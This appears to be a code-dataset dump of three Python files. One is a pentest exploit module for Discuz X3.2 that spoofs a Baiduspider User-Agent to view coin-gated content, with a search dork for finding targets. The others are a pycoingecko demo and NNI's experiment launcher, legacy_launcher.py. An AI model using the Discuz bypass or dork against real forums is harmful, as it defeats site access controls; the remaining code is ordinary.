        if response2.status_code==200:
            # Vulnerable when the marker (checked in both utf-8 and gbk
            # encodings) is present without the spoofed UA but absent with it.
            if sig.encode("utf-8") in response.content and sig.encode("gbk")in response.content and sig.encode("utf-8") not in response2.content and sig.encode("gbk") not in response2.content:
                result['fullpath'] = self.url
                result['payload'] = userAgent
        return result
| 29.702128 | 193 | 0.62894 |
from pentest.libs.exploit import Exploit
from pentest.libs.exploit import Result
class DiscuzAB(Exploit):
expName = u"DiscuzX 3.2绕过虚拟币支付查看内容"
version = "1.0"
author = "alpha1e0"
language = "php"
appName = "discuz"
appVersion = "x3.2"
reference = ['http://www.secpulse.com/archives/33393.html','http://www.wooyun.org/bugs/wooyun-2010-099659']
description = u'''
漏洞利用条件:1.DiscuzX 3.2;2.没有其他权限设置
gh: inurl:forum.php "金币 才能浏览"
'''
def _verify(self):
result = Result(self)
sig = u"才能浏览"
userAgent = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
headers = {'User-Agent':userAgent}
response = self.http.get(self.url)
response2 = self.http.get(self.url, headers=headers)
if response2.status_code==200:
if sig.encode("utf-8") in response.content and sig.encode("gbk")in response.content and sig.encode("utf-8") not in response2.content and sig.encode("gbk") not in response2.content:
result['fullpath'] = self.url
result['payload'] = userAgent
return result
| true | true |
f72613e5e98b0d452caf3c66a76ef87d7056fcbc | 650 | py | Python | 006_pycoingecko_intro/app.py | peterhaasme/100daysofweb3 | 5d41ef2261733766c4b19e42cc8a9e6c4b52c75c | [
"Unlicense"
] | 1 | 2022-02-18T04:05:33.000Z | 2022-02-18T04:05:33.000Z | 006_pycoingecko_intro/app.py | peterhaasme/100daysofweb3 | 5d41ef2261733766c4b19e42cc8a9e6c4b52c75c | [
"Unlicense"
] | null | null | null | 006_pycoingecko_intro/app.py | peterhaasme/100daysofweb3 | 5d41ef2261733766c4b19e42cc8a9e6c4b52c75c | [
"Unlicense"
] | null | null | null | # 006_pycoingecko_intro
# explore pycoingecko usage
import json
from pprint import pprint
from pycoingecko import CoinGeckoAPI
cg = CoinGeckoAPI()
# Check API server status (liveness probe; prints the server's ping reply)
ping = cg.ping()
pprint(ping)
# Get coin price: current bitcoin price quoted in USD
coin_price = cg.get_price(ids='bitcoin', vs_currencies='usd')
pprint(coin_price)
# Save all supported coins to json
# coins_list = cg.get_coins_list()
# with open('coins_list.json', 'w') as file:
# json.dump(coins_list, file)
# Save all supported coins market info to json
# coins_markets = cg.get_coins_markets(vs_currency='usd')
# with open('coins_markets.json', 'w') as file:
# json.dump(coins_markets, file)
#
| 22.413793 | 61 | 0.741538 |
import json
from pprint import pprint
from pycoingecko import CoinGeckoAPI
cg = CoinGeckoAPI()
ping = cg.ping()
pprint(ping)
coin_price = cg.get_price(ids='bitcoin', vs_currencies='usd')
pprint(coin_price)
| true | true |
f72614a99c832ad2bc453e1394d9ab2f30537e5f | 30,583 | py | Python | nni/tools/nnictl/legacy_launcher.py | dutxubo/nni | c16f4e1c89b54b8b80661ef0072433d255ad2d24 | [
"MIT"
] | null | null | null | nni/tools/nnictl/legacy_launcher.py | dutxubo/nni | c16f4e1c89b54b8b80661ef0072433d255ad2d24 | [
"MIT"
] | null | null | null | nni/tools/nnictl/legacy_launcher.py | dutxubo/nni | c16f4e1c89b54b8b80661ef0072433d255ad2d24 | [
"MIT"
] | null | null | null | # Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import json
import os
from pathlib import Path
import sys
import string
import random
import time
import tempfile
import re
from subprocess import Popen, check_call, CalledProcessError, PIPE, STDOUT
from nni.experiment.config import ExperimentConfig, convert
from nni.tools.annotation import expand_annotations, generate_search_space
from nni.tools.package_utils.tuner_factory import get_builtin_module_class_name
from .launcher_utils import validate_all_content
from .rest_utils import rest_put, rest_post, check_rest_server, check_response
from .url_utils import cluster_metadata_url, experiment_url, get_local_urls, set_prefix_url
from .config_utils import Config, Experiments
from .common_utils import get_yml_content, get_json_content, print_error, print_normal, detect_port, get_user
from .constants import NNI_HOME_DIR, ERROR_INFO, REST_TIME_OUT, EXPERIMENT_SUCCESS_INFO, LOG_HEADER
from .command_utils import check_output_command, kill_command
from .nnictl_utils import update_experiment
k8s_training_services = ['kubeflow', 'frameworkcontroller', 'adl']
def get_log_path(experiment_id):
    """Ensure the experiment's log directory exists and return the
    nnictl stdout/stderr log file paths as a (stdout, stderr) tuple."""
    log_dir = os.path.join(NNI_HOME_DIR, experiment_id, 'log')
    os.makedirs(log_dir, exist_ok=True)
    stdout_path = os.path.join(log_dir, 'nnictl_stdout.log')
    stderr_path = os.path.join(log_dir, 'nnictl_stderr.log')
    return stdout_path, stderr_path
def print_log_content(config_file_name):
    """Print the nnictl stdout and stderr logs for an experiment."""
    paths = get_log_path(config_file_name)
    labels = (' Stdout:', ' Stderr:')
    trailers = ('\n\n', None)  # blank gap only after the stdout section
    for label, path, trailer in zip(labels, paths, trailers):
        print_normal(label)
        print(check_output_command(path))
        if trailer is not None:
            print(trailer)
def start_rest_server(port, platform, mode, experiment_id, foreground=False, log_dir=None, log_level=None, url_prefix=None):
    '''Run nni manager process.

    Spawns the Node.js REST server (main.js from the nni_node package) for
    the given experiment and returns (process, start_timestamp_ms).
    '''
    # Fail fast if the requested port is taken; non-local/non-aml platforms
    # additionally need the adjacent port (port + 1) to be free.
    if detect_port(port):
        print_error('Port %s is used by another process, please reset the port!\n' \
                    'You could use \'nnictl create --help\' to get help information' % port)
        exit(1)
    if (platform not in ['local', 'aml']) and detect_port(int(port) + 1):
        print_error('%s mode need an additional adjacent port %d, and the port %d is used by another process!\n' \
                    'You could set another port to start experiment!\n' \
                    'You could use \'nnictl create --help\' to get help information' % (platform, (int(port) + 1), (int(port) + 1)))
        exit(1)
    print_normal('Starting restful server...')
    # Locate the bundled Node.js runtime and server entry point.
    import nni_node
    entry_dir = nni_node.__path__[0]
    if (not entry_dir) or (not os.path.exists(entry_dir)):
        print_error('Fail to find nni under python library')
        exit(1)
    entry_file = os.path.join(entry_dir, 'main.js')
    if sys.platform == 'win32':
        node_command = os.path.join(entry_dir, 'node.exe')
    else:
        node_command = os.path.join(entry_dir, 'node')
    cmds = [node_command, '--max-old-space-size=4096', entry_file, '--port', str(port), '--mode', platform, \
         '--experiment_id', experiment_id]
    cmds += ['--action', mode]
    if log_dir is not None:
        cmds += ['--experiments-directory', log_dir]
    if log_level is not None:
        cmds += ['--log-level', log_level]
    if foreground:
        cmds += ['--foreground', 'true']
    if url_prefix:
        _validate_prefix_path(url_prefix)
        set_prefix_url(url_prefix)
        cmds += ['--url-prefix', url_prefix.strip('/')]
    stdout_full_path, stderr_full_path = get_log_path(experiment_id)
    with open(stdout_full_path, 'a+') as stdout_file, open(stderr_full_path, 'a+') as stderr_file:
        start_time = time.time()
        time_now = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(start_time))
        #add time information in the header of log files
        log_header = LOG_HEADER % str(time_now)
        stdout_file.write(log_header)
        stderr_file.write(log_header)
        if sys.platform == 'win32':
            # On Windows, start the server in a new process group —
            # presumably so it can later be signalled (CTRL_BREAK) without
            # affecting the nnictl console; confirm against kill logic.
            from subprocess import CREATE_NEW_PROCESS_GROUP
            if foreground:
                # Foreground mode pipes output (stderr merged into stdout
                # on Windows) instead of redirecting to the log files.
                process = Popen(cmds, cwd=entry_dir, stdout=PIPE, stderr=STDOUT, creationflags=CREATE_NEW_PROCESS_GROUP)
            else:
                process = Popen(cmds, cwd=entry_dir, stdout=stdout_file, stderr=stderr_file, creationflags=CREATE_NEW_PROCESS_GROUP)
        else:
            if foreground:
                process = Popen(cmds, cwd=entry_dir, stdout=PIPE, stderr=PIPE)
            else:
                process = Popen(cmds, cwd=entry_dir, stdout=stdout_file, stderr=stderr_file)
    return process, int(start_time * 1000)
def set_trial_config(experiment_config, port, config_file_name):
    '''Send the trial configuration to the REST server.

    Returns True on success; on failure, logs the error body (when a response
    exists) to the experiment's stderr log and returns False.
    '''
    request_data = dict()
    request_data['trial_config'] = experiment_config['trial']
    response = rest_put(cluster_metadata_url(port), json.dumps(request_data), REST_TIME_OUT)
    if check_response(response):
        return True
    # Bug fix: the old code accessed response.text before checking that a
    # response existed, crashing with AttributeError when the REST call
    # returned None (the `if response:` guard below shows None is possible).
    _, stderr_full_path = get_log_path(config_file_name)
    if response is not None:
        print('Error message is {}'.format(response.text))
        with open(stderr_full_path, 'a+') as fout:
            fout.write(json.dumps(json.loads(response.text), indent=4, sort_keys=True, separators=(',', ':')))
    return False
def set_adl_config(experiment_config, port, config_file_name):
    '''Push adl cluster metadata plus common V1 settings to the REST server.

    Returns a (success, error_message) tuple; error_message is None on success.
    '''
    payload = {'adl_config': {}}  # hack for supporting v2 config, need refactor
    response = rest_put(cluster_metadata_url(port), json.dumps(payload), REST_TIME_OUT)
    if not response or response.status_code != 200:
        err_message = None
        if response is not None:
            err_message = response.text
            _, stderr_full_path = get_log_path(config_file_name)
            with open(stderr_full_path, 'a+') as fout:
                fout.write(json.dumps(json.loads(err_message), indent=4, sort_keys=True, separators=(',', ':')))
        return False, err_message
    set_V1_common_config(experiment_config, port, config_file_name)
    ok, message = setNNIManagerIp(experiment_config, port, config_file_name)
    if not ok:
        return ok, message
    # Finally push the trial configuration.
    return set_trial_config(experiment_config, port, config_file_name), None
def validate_response(response, config_file_name):
    '''Terminate the process unless *response* is a successful (HTTP 200) reply.

    On failure the error body is appended to the experiment's stderr log
    (when a response exists), printed, and the process exits with status 1.
    '''
    if response and response.status_code == 200:
        return
    # Bug fix: err_message used to stay None when response was None, so the
    # 'Error:' + err_message concatenation below raised TypeError instead of
    # reporting the failure.
    err_message = 'restful server did not respond'
    if response is not None:
        err_message = response.text
        _, stderr_full_path = get_log_path(config_file_name)
        with open(stderr_full_path, 'a+') as fout:
            fout.write(json.dumps(json.loads(err_message), indent=4, sort_keys=True, separators=(',', ':')))
    print_error('Error:' + err_message)
    exit(1)
# hack to fix v1 version_check and log_collection bug, need refactor
def set_V1_common_config(experiment_config, port, config_file_name):
    '''Push the version-check and log-collection settings shared by V1 platforms.

    Exits the process (via validate_response) when either REST call fails.
    '''
    debug = experiment_config.get('debug')
    explicit_check = experiment_config.get('versionCheck')
    # Debug mode disables the version check; an explicit versionCheck wins over both.
    version_check = True
    if debug is not None:
        version_check = not debug
    if explicit_check is not None:
        version_check = explicit_check
    response = rest_put(cluster_metadata_url(port), json.dumps({'version_check': version_check}), REST_TIME_OUT)
    validate_response(response, config_file_name)
    log_collection = experiment_config.get('logCollection')
    if log_collection:
        payload = json.dumps({'log_collection': log_collection})
        validate_response(rest_put(cluster_metadata_url(port), payload, REST_TIME_OUT), config_file_name)
def setNNIManagerIp(experiment_config, port, config_file_name):
    '''Push the nniManagerIp setting when configured.

    Returns (success, error_message); a missing nniManagerIp counts as success.
    '''
    if experiment_config.get('nniManagerIp') is None:
        return True, None
    payload = {'nni_manager_ip': {'nniManagerIp': experiment_config['nniManagerIp']}}
    response = rest_put(cluster_metadata_url(port), json.dumps(payload), REST_TIME_OUT)
    if response and response.status_code == 200:
        return True, None
    err_message = None
    if response is not None:
        err_message = response.text
        _, stderr_full_path = get_log_path(config_file_name)
        with open(stderr_full_path, 'a+') as fout:
            fout.write(json.dumps(json.loads(err_message), indent=4, sort_keys=True, separators=(',', ':')))
    return False, err_message
def set_kubeflow_config(experiment_config, port, config_file_name):
    '''Push kubeflow cluster metadata plus common V1 settings to the REST server.

    Returns a (success, error_message) tuple; error_message is None on success.
    '''
    payload = {'kubeflow_config': experiment_config['kubeflowConfig']}
    response = rest_put(cluster_metadata_url(port), json.dumps(payload), REST_TIME_OUT)
    if not response or response.status_code != 200:
        err_message = None
        if response is not None:
            err_message = response.text
            _, stderr_full_path = get_log_path(config_file_name)
            with open(stderr_full_path, 'a+') as fout:
                fout.write(json.dumps(json.loads(err_message), indent=4, sort_keys=True, separators=(',', ':')))
        return False, err_message
    set_V1_common_config(experiment_config, port, config_file_name)
    ok, message = setNNIManagerIp(experiment_config, port, config_file_name)
    if not ok:
        return ok, message
    # Finally push the trial configuration.
    return set_trial_config(experiment_config, port, config_file_name), None
def set_frameworkcontroller_config(experiment_config, port, config_file_name):
    '''Push frameworkcontroller cluster metadata plus common V1 settings.

    Returns a (success, error_message) tuple; error_message is None on success.
    (The original docstring said "kubeflow" — copy-paste residue.)
    '''
    payload = {'frameworkcontroller_config': experiment_config['frameworkcontrollerConfig']}
    response = rest_put(cluster_metadata_url(port), json.dumps(payload), REST_TIME_OUT)
    if not response or response.status_code != 200:
        err_message = None
        if response is not None:
            err_message = response.text
            _, stderr_full_path = get_log_path(config_file_name)
            with open(stderr_full_path, 'a+') as fout:
                fout.write(json.dumps(json.loads(err_message), indent=4, sort_keys=True, separators=(',', ':')))
        return False, err_message
    set_V1_common_config(experiment_config, port, config_file_name)
    ok, message = setNNIManagerIp(experiment_config, port, config_file_name)
    if not ok:
        return ok, message
    # Finally push the trial configuration.
    return set_trial_config(experiment_config, port, config_file_name), None
def set_shared_storage(experiment_config, port, config_file_name):
    '''Push the sharedStorage settings when the config defines them.

    Returns (success, error_message); absence of sharedStorage counts as success.
    '''
    if 'sharedStorage' not in experiment_config:
        return True, None
    payload = json.dumps({'shared_storage_config': experiment_config['sharedStorage']})
    response = rest_put(cluster_metadata_url(port), payload, REST_TIME_OUT)
    if response and response.status_code == 200:
        return True, None
    err_message = None
    if response is not None:
        err_message = response.text
        _, stderr_full_path = get_log_path(config_file_name)
        with open(stderr_full_path, 'a+') as fout:
            fout.write(json.dumps(json.loads(err_message), indent=4, sort_keys=True, separators=(',', ':')))
    return False, err_message
def set_experiment_v1(experiment_config, mode, port, config_file_name):
    '''Call startExperiment (rest POST /experiment) with yaml file content.

    Builds the V1 request payload from *experiment_config* and POSTs it.
    Returns the REST response on success, or None on failure (after logging
    the error body to the experiment's stderr log).
    '''
    request_data = dict()
    request_data['authorName'] = experiment_config['authorName']
    request_data['experimentName'] = experiment_config['experimentName']
    request_data['trialConcurrency'] = experiment_config['trialConcurrency']
    request_data['maxExecDuration'] = experiment_config['maxExecDuration']
    # Both the legacy and the newer duration/number field names are sent.
    request_data['maxExperimentDuration'] = str(experiment_config['maxExecDuration']) + 's'
    request_data['maxTrialNum'] = experiment_config['maxTrialNum']
    request_data['maxTrialDuration'] = experiment_config['maxTrialDuration']
    request_data['maxTrialNumber'] = experiment_config['maxTrialNum']
    request_data['searchSpace'] = experiment_config.get('searchSpace')
    request_data['trainingServicePlatform'] = experiment_config.get('trainingServicePlatform')
    # hack for hotfix, fix config.trainingService undefined error, need refactor
    request_data['trainingService'] = {'platform': experiment_config.get('trainingServicePlatform')}
    if experiment_config.get('description'):
        request_data['description'] = experiment_config['description']
    if experiment_config.get('multiPhase'):
        request_data['multiPhase'] = experiment_config.get('multiPhase')
    if experiment_config.get('multiThread'):
        request_data['multiThread'] = experiment_config.get('multiThread')
    if experiment_config.get('nniManagerIp'):
        request_data['nniManagerIp'] = experiment_config.get('nniManagerIp')
    # An advisor replaces the tuner/assessor pair; only one branch is taken.
    if experiment_config.get('advisor'):
        request_data['advisor'] = experiment_config['advisor']
        if request_data['advisor'].get('gpuNum'):
            print_error('gpuNum is deprecated, please use gpuIndices instead.')
        if request_data['advisor'].get('gpuIndices') and isinstance(request_data['advisor'].get('gpuIndices'), int):
            request_data['advisor']['gpuIndices'] = str(request_data['advisor'].get('gpuIndices'))
    else:
        request_data['tuner'] = experiment_config['tuner']
        if request_data['tuner'].get('gpuNum'):
            print_error('gpuNum is deprecated, please use gpuIndices instead.')
        if request_data['tuner'].get('gpuIndices') and isinstance(request_data['tuner'].get('gpuIndices'), int):
            request_data['tuner']['gpuIndices'] = str(request_data['tuner'].get('gpuIndices'))
        if 'assessor' in experiment_config:
            request_data['assessor'] = experiment_config['assessor']
            if request_data['assessor'].get('gpuNum'):
                print_error('gpuNum is deprecated, please remove it from your config file.')
    #debug mode should disable version check
    if experiment_config.get('debug') is not None:
        request_data['versionCheck'] = not experiment_config.get('debug')
    #validate version check
    if experiment_config.get('versionCheck') is not None:
        request_data['versionCheck'] = experiment_config.get('versionCheck')
    if experiment_config.get('logCollection'):
        request_data['logCollection'] = experiment_config.get('logCollection')
    # Platform-specific cluster metadata rides along with the experiment POST.
    request_data['clusterMetaData'] = []
    if experiment_config['trainingServicePlatform'] == 'kubeflow':
        request_data['clusterMetaData'].append(
            {'key': 'kubeflow_config', 'value': experiment_config['kubeflowConfig']})
        request_data['clusterMetaData'].append(
            {'key': 'trial_config', 'value': experiment_config['trial']})
    elif experiment_config['trainingServicePlatform'] == 'frameworkcontroller':
        request_data['clusterMetaData'].append(
            {'key': 'frameworkcontroller_config', 'value': experiment_config['frameworkcontrollerConfig']})
        request_data['clusterMetaData'].append(
            {'key': 'trial_config', 'value': experiment_config['trial']})
    elif experiment_config['trainingServicePlatform'] == 'adl':
        request_data['clusterMetaData'].append(
            {'key': 'trial_config', 'value': experiment_config['trial']})
    response = rest_post(experiment_url(port), json.dumps(request_data), REST_TIME_OUT, show_error=True)
    if check_response(response):
        return response
    else:
        _, stderr_full_path = get_log_path(config_file_name)
        if response is not None:
            with open(stderr_full_path, 'a+') as fout:
                fout.write(json.dumps(json.loads(response.text), indent=4, sort_keys=True, separators=(',', ':')))
            print_error('Setting experiment error, error message is {}'.format(response.text))
        return None
def set_experiment_v2(experiment_config, mode, port, config_file_name):
    '''POST a V2 experiment config to the REST server (startExperiment).

    Returns the response on success, or None after logging the error body.
    '''
    response = rest_post(experiment_url(port), json.dumps(experiment_config), REST_TIME_OUT, show_error=True)
    if check_response(response):
        return response
    _, stderr_full_path = get_log_path(config_file_name)
    if response is not None:
        with open(stderr_full_path, 'a+') as fout:
            fout.write(json.dumps(json.loads(response.text), indent=4, sort_keys=True, separators=(',', ':')))
        print_error('Setting experiment error, error message is {}'.format(response.text))
    return None
def set_platform_config(platform, experiment_config, port, config_file_name, rest_process):
    '''Call set_cluster_metadata for the given k8s-style platform, then shared storage.

    On any failure, prints the error, kills the REST server, and exits with
    status 1. Raises for an unsupported platform or a dead REST server.
    '''
    print_normal('Setting {0} config...'.format(platform))
    config_result, err_msg = None, None
    if platform == 'adl':
        config_result, err_msg = set_adl_config(experiment_config, port, config_file_name)
    elif platform == 'kubeflow':
        config_result, err_msg = set_kubeflow_config(experiment_config, port, config_file_name)
    elif platform == 'frameworkcontroller':
        config_result, err_msg = set_frameworkcontroller_config(experiment_config, port, config_file_name)
    else:
        # Fix: removed the unreachable exit(1) that followed this raise.
        raise Exception(ERROR_INFO % 'Unsupported platform!')
    if config_result:
        config_result, err_msg = set_shared_storage(experiment_config, port, config_file_name)
    if config_result:
        print_normal('Successfully set {0} config!'.format(platform))
    else:
        print_error('Failed! Error is: {}'.format(err_msg))
        try:
            kill_command(rest_process.pid)
        except Exception:
            raise Exception(ERROR_INFO % 'Rest server stopped!')
        exit(1)
def launch_experiment(args, experiment_config, mode, experiment_id, config_version):
    '''Follow steps to start the REST server and start the experiment.

    mode is 'create', 'resume', or 'view'; config_version is 1 (legacy yaml
    schema) or 2. Starts the node REST server, registers the experiment,
    expands annotations when configured, pushes platform config (V1 only),
    POSTs the experiment, and prints the web UI URLs. Exits on failure.
    '''
    # check packages for tuner
    package_name, module_name = None, None
    if experiment_config.get('tuner') and experiment_config['tuner'].get('builtinTunerName'):
        package_name = experiment_config['tuner']['builtinTunerName']
        module_name, _ = get_builtin_module_class_name('tuners', package_name)
    elif experiment_config.get('advisor') and experiment_config['advisor'].get('builtinAdvisorName'):
        package_name = experiment_config['advisor']['builtinAdvisorName']
        module_name, _ = get_builtin_module_class_name('advisors', package_name)
    if package_name and module_name:
        try:
            # Probe the import in a subprocess so a broken dependency cannot
            # crash nnictl itself; output goes to the experiment logs.
            stdout_full_path, stderr_full_path = get_log_path(experiment_id)
            with open(stdout_full_path, 'a+') as stdout_file, open(stderr_full_path, 'a+') as stderr_file:
                check_call([sys.executable, '-c', 'import %s'%(module_name)], stdout=stdout_file, stderr=stderr_file)
        except CalledProcessError:
            print_error('some errors happen when import package %s.' %(package_name))
            print_log_content(experiment_id)
            if package_name in ['SMAC', 'BOHB', 'PPOTuner']:
                print_error(f'The dependencies for {package_name} can be installed through pip install nni[{package_name}]')
            raise
    # V1 and V2 configs name the working-directory field differently.
    if config_version == 1:
        log_dir = experiment_config['logDir'] if experiment_config.get('logDir') else NNI_HOME_DIR
    else:
        log_dir = experiment_config['experimentWorkingDirectory'] if experiment_config.get('experimentWorkingDirectory') else NNI_HOME_DIR
    log_level = experiment_config['logLevel'] if experiment_config.get('logLevel') else 'info'
    #view experiment mode do not need debug function, when view an experiment, there will be no new logs created
    foreground = False
    if mode != 'view':
        foreground = args.foreground
        if log_level not in ['trace', 'debug'] and (args.debug or experiment_config.get('debug') is True):
            log_level = 'debug'
    # start rest server
    if config_version == 1:
        platform = experiment_config['trainingServicePlatform']
    elif isinstance(experiment_config['trainingService'], list):
        platform = 'hybrid'
    else:
        platform = experiment_config['trainingService']['platform']
    rest_process, start_time = start_rest_server(args.port, platform, \
        mode, experiment_id, foreground, log_dir, log_level, args.url_prefix)
    # save experiment information
    Experiments().add_experiment(experiment_id, args.port, start_time,
                                 platform,
                                 experiment_config.get('experimentName', 'N/A')
                                 , pid=rest_process.pid, logDir=log_dir, prefixUrl=args.url_prefix)
    # Deal with annotation
    if experiment_config.get('useAnnotation'):
        path = os.path.join(tempfile.gettempdir(), get_user(), 'nni', 'annotation')
        if not os.path.isdir(path):
            os.makedirs(path)
        path = tempfile.mkdtemp(dir=path)
        if config_version == 1:
            nas_mode = experiment_config['trial'].get('nasMode', 'classic_mode')
            code_dir = expand_annotations(experiment_config['trial']['codeDir'], path, nas_mode=nas_mode)
            experiment_config['trial']['codeDir'] = code_dir
        else:
            code_dir = expand_annotations(experiment_config['trialCodeDirectory'], path)
            experiment_config['trialCodeDirectory'] = code_dir
        search_space = generate_search_space(code_dir)
        experiment_config['searchSpace'] = search_space
        assert search_space, ERROR_INFO % 'Generated search space is empty'
    elif config_version == 1:
        if experiment_config.get('searchSpacePath'):
            search_space = get_json_content(experiment_config.get('searchSpacePath'))
            experiment_config['searchSpace'] = search_space
        else:
            experiment_config['searchSpace'] = ''
    # check rest server
    running, _ = check_rest_server(args.port)
    if running:
        print_normal('Successfully started Restful server!')
    else:
        print_error('Restful server start failed!')
        print_log_content(experiment_id)
        try:
            kill_command(rest_process.pid)
        except Exception:
            raise Exception(ERROR_INFO % 'Rest server stopped!')
        exit(1)
    if config_version == 1 and mode != 'view':
        # set platform configuration
        set_platform_config(experiment_config['trainingServicePlatform'], experiment_config, args.port,\
                            experiment_id, rest_process)
    # start a new experiment
    print_normal('Starting experiment...')
    # set debug configuration
    if mode != 'view' and experiment_config.get('debug') is None:
        experiment_config['debug'] = args.debug
    if config_version == 1:
        response = set_experiment_v1(experiment_config, mode, args.port, experiment_id)
    else:
        response = set_experiment_v2(experiment_config, mode, args.port, experiment_id)
    if response:
        if experiment_id is None:
            experiment_id = json.loads(response.text).get('experiment_id')
    else:
        print_error('Start experiment failed!')
        print_log_content(experiment_id)
        try:
            kill_command(rest_process.pid)
        except Exception:
            raise Exception(ERROR_INFO % 'Restful server stopped!')
        exit(1)
    url_prefix_format = '' if args.url_prefix is None else '/{0}'.format(args.url_prefix)
    if experiment_config.get('nniManagerIp'):
        web_ui_url_list = ['http://{0}:{1}{2}'.format(experiment_config['nniManagerIp'], str(args.port), url_prefix_format)]
    else:
        web_ui_url_list = get_local_urls(args.port, url_prefix_format)
    Experiments().update_experiment(experiment_id, 'webuiUrl', web_ui_url_list)
    print_normal(EXPERIMENT_SUCCESS_INFO % (experiment_id, ' '.join(web_ui_url_list)))
    # In foreground mode, stream the manager's stdout until Ctrl+C.
    if mode != 'view' and args.foreground:
        try:
            while True:
                log_content = rest_process.stdout.readline().strip().decode('utf-8')
                print(log_content)
        except KeyboardInterrupt:
            kill_command(rest_process.pid)
            print_normal('Stopping experiment...')
def _validate_v1(config, path):
    '''Validate a V1 (legacy schema) config, terminating nnictl when invalid.'''
    try:
        validate_all_content(config, path)
    except Exception as exc:
        print_error(f'Config V1 validation failed: {repr(exc)}')
        exit(1)
def _validate_v2(config, path):
    '''Validate a V2 config and return its canonical JSON form; exit on failure.'''
    base_path = Path(path).parent
    try:
        conf = ExperimentConfig(_base_path=base_path, **config)
        return conf.json()
    except Exception as e:
        print_error(f'Config V2 validation failed: {repr(e)}')
        # Bug fix: previously fell through and returned None, so the caller
        # passed None to launch_experiment and crashed with an unrelated
        # error. Mirror _validate_v1 and terminate with a clear message.
        exit(1)
def _validate_prefix_path(path):
assert not path.startswith('/'), 'URL prefix should not start with "/".'
parts = path.split('/')
valid = all(re.match('^[A-Za-z0-9_-]*$', part) for part in parts)
assert valid, 'URL prefix should only contain letter, number, underscore, and hyphen.'
def create_experiment(args):
    '''Start a new experiment from the config file given in args.config.

    Detects the config schema (V1 if trainingServicePlatform is present),
    validates it, converts V1 non-k8s configs to V2, and launches the
    experiment. On any launch failure, kills the REST server and exits.
    '''
    # Random 8-character alphanumeric experiment id.
    experiment_id = ''.join(random.sample(string.ascii_letters + string.digits, 8))
    config_path = os.path.abspath(args.config)
    if not os.path.exists(config_path):
        print_error('Please set correct config path!')
        exit(1)
    config_yml = get_yml_content(config_path)
    if 'trainingServicePlatform' in config_yml:
        _validate_v1(config_yml, config_path)
        platform = config_yml['trainingServicePlatform']
        # Only the k8s-style platforms still go through the V1 launch path.
        if platform in k8s_training_services:
            schema = 1
            config_v1 = config_yml
        else:
            schema = 2
            config_v2 = convert.to_v2(config_yml).json()
    else:
        config_v2 = _validate_v2(config_yml, config_path)
        schema = 2
    try:
        if schema == 1:
            launch_experiment(args, config_v1, 'create', experiment_id, 1)
        else:
            launch_experiment(args, config_v2, 'create', experiment_id, 2)
    except Exception as exception:
        # Best-effort cleanup of the REST server started during launch.
        restServerPid = Experiments().get_all_experiments().get(experiment_id, {}).get('pid')
        if restServerPid:
            kill_command(restServerPid)
        print_error(exception)
        exit(1)
def manage_stopped_experiment(args, mode):
    '''Resume or view a stopped experiment registered on this machine.

    mode is 'resume' or 'view'. Requires args.id to identify the experiment;
    exits with an error when the id is missing, unknown, or not STOPPED.
    '''
    update_experiment()
    experiments_config = Experiments()
    experiments_dict = experiments_config.get_all_experiments()
    experiment_id = None
    #find the latest stopped experiment
    if not args.id:
        print_error('Please set experiment id! \nYou could use \'nnictl {0} id\' to {0} a stopped experiment!\n' \
        'You could use \'nnictl experiment list --all\' to show all experiments!\n' \
        'If your experiment is not started in current machine, you could specify experiment folder using ' \
        '--experiment_dir argument'.format(mode))
        exit(1)
    else:
        if experiments_dict.get(args.id) is None:
            print_error('Id %s not exist!' % args.id)
            exit(1)
        if experiments_dict[args.id]['status'] != 'STOPPED':
            print_error('Only stopped experiments can be {0}ed!'.format(mode))
            exit(1)
        experiment_id = args.id
    print_normal('{0} experiment {1}...'.format(mode, experiment_id))
    experiment_config = Config(experiment_id, experiments_dict[args.id]['logDir']).get_config()
    experiments_config.update_experiment(args.id, 'port', args.port)
    args.url_prefix = experiments_dict[args.id]['prefixUrl']
    assert 'trainingService' in experiment_config or 'trainingServicePlatform' in experiment_config
    try:
        # 'trainingServicePlatform' marks a V1 config; 'trainingService' a V2 one.
        if 'trainingServicePlatform' in experiment_config:
            experiment_config['logDir'] = experiments_dict[args.id]['logDir']
            launch_experiment(args, experiment_config, mode, experiment_id, 1)
        else:
            experiment_config['experimentWorkingDirectory'] = experiments_dict[args.id]['logDir']
            launch_experiment(args, experiment_config, mode, experiment_id, 2)
    except Exception as exception:
        # Best-effort cleanup of the REST server started during launch.
        restServerPid = Experiments().get_all_experiments().get(experiment_id, {}).get('pid')
        if restServerPid:
            kill_command(restServerPid)
        print_error(exception)
        exit(1)
def view_experiment(args):
    '''Open a stopped experiment in view mode, either from an external
    directory (args.experiment_dir) or from the local experiment registry.'''
    handler = manage_external_experiment if args.experiment_dir else manage_stopped_experiment
    handler(args, 'view')
def resume_experiment(args):
    '''Resume a stopped experiment, either from an external directory
    (args.experiment_dir) or from the local experiment registry.'''
    # Fix: removed a stray duplicated '''view a stopped experiment''' docstring
    # statement left over from copy-pasting view_experiment.
    if args.experiment_dir:
        manage_external_experiment(args, 'resume')
    else:
        manage_stopped_experiment(args, 'resume')
def manage_external_experiment(args, mode):
    '''Resume or view an experiment stored under an external path.

    mode is 'resume' or 'view'. When args.id is absent, the last folder name
    of args.experiment_dir is taken as the experiment id and its parent as
    the log directory. Exits on invalid arguments or launch failure.
    '''
    # validate arguments
    if not os.path.exists(args.experiment_dir):
        print_error('Folder %s does not exist!' % args.experiment_dir)
        exit(1)
    if not os.path.isdir(args.experiment_dir):
        print_error('Path %s is not folder directory!' % args.experiment_dir)
        exit(1)
    if args.id:
        experiment_id = args.id
        log_dir = args.experiment_dir
    else:
        print_normal('NNI can not detect experiment id in argument, will use last folder name as experiment id in experiment_dir argument.')
        experiment_id = Path(args.experiment_dir).name
        log_dir = str(Path(args.experiment_dir).parent)
        if not experiment_id:
            print_error("Please set experiment id argument, or add id as the last folder name in experiment_dir argument.")
            exit(1)
    args.url_prefix = None
    experiment_config = Config(experiment_id, log_dir).get_config()
    assert 'trainingService' in experiment_config or 'trainingServicePlatform' in experiment_config
    try:
        # 'trainingServicePlatform' marks a V1 config; 'trainingService' a V2 one.
        if 'trainingServicePlatform' in experiment_config:
            experiment_config['logDir'] = log_dir
            launch_experiment(args, experiment_config, mode, experiment_id, 1)
        else:
            experiment_config['experimentWorkingDirectory'] = log_dir
            launch_experiment(args, experiment_config, mode, experiment_id, 2)
    except Exception as exception:
        print_error(exception)
        exit(1)
| 49.647727 | 140 | 0.688552 |
import json
import os
